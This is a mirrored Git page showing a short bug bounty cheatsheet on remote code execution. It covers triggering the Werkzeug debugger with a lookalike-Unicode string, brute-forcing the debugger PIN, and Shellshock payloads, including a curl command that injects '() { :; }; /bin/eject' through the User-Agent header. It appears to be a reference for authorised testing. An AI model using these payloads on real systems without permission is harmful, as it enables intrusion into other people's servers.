Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-25 12:30:19 +00:00
Code Issues Projects Releases Packages Wiki Activity
bugbounty-cheatsheet/cheatsheets/rce.md
EdOverflow f1a044b6b6 Add Shellshock bug.
2017-07-14 15:25:52 +01:00

21 lines
No EOL
527 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## RCE
**Werkzeug Debugger**
Find somewhere where user input can be supplied and submit the following string to cause an error:
```
strіng
```
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
**Shellshock Bug**
```bash
() { :;}; echo vulnerable
```
```zsh
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
```
Reference in a new issue View git blame Copy permalink